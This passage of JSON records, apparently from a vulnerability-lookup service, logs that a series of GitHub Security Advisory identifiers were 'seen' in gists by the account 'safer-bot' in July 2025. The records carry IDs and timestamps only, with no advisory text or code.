"https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "9c175a31-0b33-4138-bcbd-be530b2efbb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45hx-wfhj-473x", "type": "seen", "source": "https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "31c1f6d5-4e73-492d-b234-c63e71cc9c0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h376-j262-vhq6", "type": "seen", "source": "https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "170bfc6e-c938-4789-97f9-3b710b12654d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "c05da9db-3cd7-4731-bf4f-0af68b510cc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/3552deb0e3e58000388a51849ac4a95b", "content": "", "creation_timestamp": "2025-07-16T17:09:41.000000Z"}, {"uuid": "5973c87b-2258-49fa-bfe2-5e1d224d67a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/96addcea46b2b5e801417531e495119c", "content": "", "creation_timestamp": "2025-07-16T17:11:25.000000Z"}, {"uuid": "3a21cd43-309c-42ab-bed4-53c8fbd32dc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/11a735eaa0f5293fab968d31200725d9", "content": "", "creation_timestamp": "2025-07-16T17:15:16.000000Z"}, {"uuid": "79daff57-bdce-4655-90a8-023ce145bce8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/9353c5e956d84c0855d6ad4a82192314", "content": "", "creation_timestamp": "2025-07-16T17:14:45.000000Z"}, {"uuid": "26bee38f-b039-410f-9e6d-f1408f75a036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "9baaa353-8535-496b-9874-8d85bf4cbf85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22wj-vf5f-wrvj", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "bfd489de-ad4a-4fe9-a4cc-32c07ac23f9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "736f5970-261b-4999-a9ac-1a779db16119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rpj-hg47-cx62", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "e09fbd45-d8ee-485c-8fcf-ef0200d3590e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45hx-wfhj-473x", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "e05b4541-734d-43f0-a25f-64615ddacfbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "2c0babcc-1393-456b-980e-ca01c8f8063e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h376-j262-vhq6", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "c3183c4d-6827-43a4-9559-6e740c1ec86c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "a150f440-ba33-4166-9e37-55afcc29985e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "f069e61d-9709-4b86-a41a-9f9efd40cab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/2c549c1f94bce8355084487a9608ea85", "content": "", "creation_timestamp": "2025-07-16T17:20:13.000000Z"}, {"uuid": "a8997f70-1a1e-4088-9322-786e91d51b2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/3bbac1780449adb17e05d84f5d24f176", "content": "", "creation_timestamp": "2025-07-16T17:22:58.000000Z"}, {"uuid": "8329fa81-8e31-4682-aee9-b4ca08b63c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/3bbac1780449adb17e05d84f5d24f176", "content": "", "creation_timestamp": "2025-07-16T17:22:58.000000Z"}, {"uuid": "33d60c26-92ab-4254-bd22-d810c73cd3b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/3bbac1780449adb17e05d84f5d24f176", "content": "", "creation_timestamp": "2025-07-16T17:22:58.000000Z"}, {"uuid": "7116000a-003e-41c7-a5e2-1676309327c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/3bbac1780449adb17e05d84f5d24f176", "content": "", "creation_timestamp": "2025-07-16T17:22:58.000000Z"}, {"uuid": "4b3a4b53-a3cc-4e65-8c71-74494258ae09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/8adfdb5d2c48acfbf0b54403a7402e8d", "content": "", "creation_timestamp": "2025-07-16T17:25:05.000000Z"}, {"uuid": "904d0658-a1a5-41a9-9918-e0f6fd4c61ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hfq9-hggm-c56q", "type": "seen", "source": "https://gist.github.com/safer-bot/8adfdb5d2c48acfbf0b54403a7402e8d", "content": "", "creation_timestamp": "2025-07-16T17:25:05.000000Z"}, {"uuid": "7c3cd721-1ba1-4e9e-bd57-3827a71e13fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/00b4890b4d5d376468bfb268678d4ab4", "content": "", "creation_timestamp": "2025-07-16T17:28:55.000000Z"}, {"uuid": "90f24af7-0178-4f33-b20b-6d8cc73a1f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/00b4890b4d5d376468bfb268678d4ab4", "content": "", "creation_timestamp": "2025-07-16T17:28:55.000000Z"}, {"uuid": "2c7342f6-01d1-41e5-ac62-693c8d5d0a8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/fd4a0aed7f94f198afd75707a40fc2a1", "content": "", "creation_timestamp": "2025-07-16T17:31:17.000000Z"}, {"uuid": "b5d7ab79-d753-45ac-bec1-737ebf2a383c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/fd4a0aed7f94f198afd75707a40fc2a1", "content": "", "creation_timestamp": "2025-07-16T17:31:17.000000Z"}, {"uuid": "efa11a14-e993-496a-919f-32d882527b4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/fd4a0aed7f94f198afd75707a40fc2a1", "content": "", "creation_timestamp": "2025-07-16T17:31:17.000000Z"}, {"uuid": "85a6e4c8-1f3c-447d-ae5a-47ba67098ff0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "b80e25bb-efe3-4f98-9e9b-ddf3f54452c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "88e293c7-1fa8-4bce-94b4-891f076f495d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "4f599b59-8457-4f0d-8593-6ec02bef63ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "df45a393-b1e5-4e6d-a09a-2e87ab4610fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8vhq-qq4p-grq3", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "8cc32713-d50c-4341-be8f-052684dd4a54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "22429e6a-b465-4c8c-9c4b-2e269f69a5c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "780ea648-f57d-4727-a15a-74b954cd6009", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "ef3b2caa-444b-4360-83cc-5777b0973a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "1bdf23c4-e965-4c3a-a77b-2cb3ad945508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/b830b8c2358b61bbc4e5089a3e6dcf9e", "content": "", "creation_timestamp": "2025-07-16T17:36:26.000000Z"}, {"uuid": "31056681-901e-4a23-a426-817db9d66a1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/8909a2c337dbcd1e50829d1eb8b9ecc9", "content": "", "creation_timestamp": "2025-07-16T17:35:53.000000Z"}, {"uuid": "16f95cdf-02c8-403e-9d8d-3b852b512695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/8909a2c337dbcd1e50829d1eb8b9ecc9", "content": "", "creation_timestamp": "2025-07-16T17:35:53.000000Z"}, {"uuid": "84d36ffd-38d2-49ba-8db5-f812dd18625a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmfg-rjjm-rjrj", "type": "seen", "source": "https://gist.github.com/safer-bot/8909a2c337dbcd1e50829d1eb8b9ecc9", "content": "", "creation_timestamp": "2025-07-16T17:35:53.000000Z"}, {"uuid": "f6d1dac3-600f-428f-ba4c-935a5c86a4be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/8909a2c337dbcd1e50829d1eb8b9ecc9", "content": "", "creation_timestamp": "2025-07-16T17:35:53.000000Z"}, {"uuid": "a9fec54f-4933-4092-bbb2-365ca50a18b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/8909a2c337dbcd1e50829d1eb8b9ecc9", "content": "", "creation_timestamp": "2025-07-16T17:35:53.000000Z"}, {"uuid": "edd902db-ae24-4e23-b2b6-f988400fb33e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8909a2c337dbcd1e50829d1eb8b9ecc9", "content": "", "creation_timestamp": "2025-07-16T17:35:53.000000Z"}, {"uuid": "64c248c1-b549-453c-80b5-c5227b688c64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/8909a2c337dbcd1e50829d1eb8b9ecc9", "content": "", "creation_timestamp": "2025-07-16T17:35:53.000000Z"}, {"uuid": "4fe8d98d-ba69-4cc9-8e5a-f081a2764f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vgq5-3255-v292", "type": "seen", "source": "https://gist.github.com/safer-bot/7a769e024faffd1f31a85148c77e1d5f", "content": "", "creation_timestamp": "2025-07-16T17:38:11.000000Z"}, {"uuid": "f89f49e8-fc86-4950-8afb-b109a38bade0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/7a769e024faffd1f31a85148c77e1d5f", "content": "", "creation_timestamp": "2025-07-16T17:38:11.000000Z"}, {"uuid": "f4656f68-63e8-4b48-85a7-3eddcd1155ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/7a769e024faffd1f31a85148c77e1d5f", "content": "", "creation_timestamp": "2025-07-16T17:38:11.000000Z"}, {"uuid": "7231d249-c51f-4f9b-a487-1805b8b4e3bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/7a769e024faffd1f31a85148c77e1d5f", "content": "", "creation_timestamp": "2025-07-16T17:38:11.000000Z"}, {"uuid": "163b231f-c8a8-406e-9cf5-5fc06e58ae5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/7a769e024faffd1f31a85148c77e1d5f", "content": "", "creation_timestamp": "2025-07-16T17:38:11.000000Z"}, {"uuid": "3c3ea3ff-093b-4d2d-8975-815e5af732b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/067cdcb0561c7164a1090c2c51242881", "content": "", "creation_timestamp": "2025-07-16T17:45:47.000000Z"}, {"uuid": "a57ee141-2e74-4a73-a364-38c03cb68ef6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/067cdcb0561c7164a1090c2c51242881", "content": "", "creation_timestamp": "2025-07-16T17:45:47.000000Z"}, {"uuid": "3aa82bf1-cc52-4d5e-8ad3-ca653a56c788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/067cdcb0561c7164a1090c2c51242881", "content": "", "creation_timestamp": "2025-07-16T17:45:47.000000Z"}, {"uuid": "ef9a5ed1-8c89-477e-b347-da46515763a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf00d10477e654f7d2ac4e12cd39666", "content": "", "creation_timestamp": "2025-07-16T17:45:14.000000Z"}, {"uuid": "4f2adf14-d620-4daa-b649-ebffb5ecc8d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf00d10477e654f7d2ac4e12cd39666", "content": "", "creation_timestamp": "2025-07-16T17:45:14.000000Z"}, {"uuid": "7e95c2e7-1232-46ed-9855-35f5e0311ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf00d10477e654f7d2ac4e12cd39666", "content": "", "creation_timestamp": "2025-07-16T17:45:14.000000Z"}, {"uuid": "ba6f2ae6-9092-4e85-a21d-68928b701b99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf00d10477e654f7d2ac4e12cd39666", "content": "", "creation_timestamp": "2025-07-16T17:45:14.000000Z"}, {"uuid": "9125488d-0ed4-446e-a4bb-8ef0eaacc5a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf00d10477e654f7d2ac4e12cd39666", "content": "", "creation_timestamp": "2025-07-16T17:45:14.000000Z"}, {"uuid": "619e25dc-0843-4a9d-b0cc-2e7de04aaf9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf00d10477e654f7d2ac4e12cd39666", "content": "", "creation_timestamp": "2025-07-16T17:45:14.000000Z"}, {"uuid": "e95b5688-41bd-4366-8e06-930ad4cf25ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/c7e578e346ccc19ed3c2c262dffab409", "content": "", "creation_timestamp": "2025-07-16T17:47:28.000000Z"}, {"uuid": "9d19676f-407c-4d38-a352-f403ea1c43dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/c7e578e346ccc19ed3c2c262dffab409", "content": "", "creation_timestamp": "2025-07-16T17:47:28.000000Z"}, {"uuid": "e6bd5c98-2cce-444d-a588-a50f8a9a9cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-889j-63jv-qhr8", "type": "seen", "source": "https://gist.github.com/safer-bot/c097818be3228e365204140ff1146df6", "content": "", "creation_timestamp": "2025-07-16T17:53:34.000000Z"}, {"uuid": "fdfcb99f-708b-4a24-8ffc-b4d8d24b22c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/c097818be3228e365204140ff1146df6", "content": "", "creation_timestamp": "2025-07-16T17:53:34.000000Z"}, {"uuid": "cfa3952f-2905-4647-9683-1061f77791e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/c097818be3228e365204140ff1146df6", "content": "", "creation_timestamp": "2025-07-16T17:53:34.000000Z"}, {"uuid": "294fb2a6-cbe1-4ab5-af5d-dd38fda59f66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/54d45ce3ed8f40a611c55cfa6d14a164", "content": "", "creation_timestamp": "2025-07-16T17:58:36.000000Z"}, {"uuid": "cd1fef88-c6d8-473f-92a9-0ff01d4f5f73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/54d45ce3ed8f40a611c55cfa6d14a164", "content": "", "creation_timestamp": "2025-07-16T17:58:36.000000Z"}, {"uuid": "4c42b6d9-389c-46e5-9a87-7189c319c84c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73xv-w5gp-frxh", "type": "seen", "source": "https://gist.github.com/safer-bot/54d45ce3ed8f40a611c55cfa6d14a164", "content": "", "creation_timestamp": "2025-07-16T17:58:36.000000Z"}, {"uuid": "370b17a6-f283-4662-a838-dd7cdcf701bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/54d45ce3ed8f40a611c55cfa6d14a164", "content": "", "creation_timestamp": "2025-07-16T17:58:36.000000Z"}, {"uuid": "ef04fa00-dfe0-4678-87e7-c1a7086fa346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6xx3-rg99-gc3p", "type": "seen", "source": "https://gist.github.com/safer-bot/54d45ce3ed8f40a611c55cfa6d14a164", "content": "", "creation_timestamp": "2025-07-16T17:58:36.000000Z"}, {"uuid": "66f50c3a-3c5d-457d-9661-96b3da58c289", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-72m5-fvvv-55m6", "type": "seen", "source": 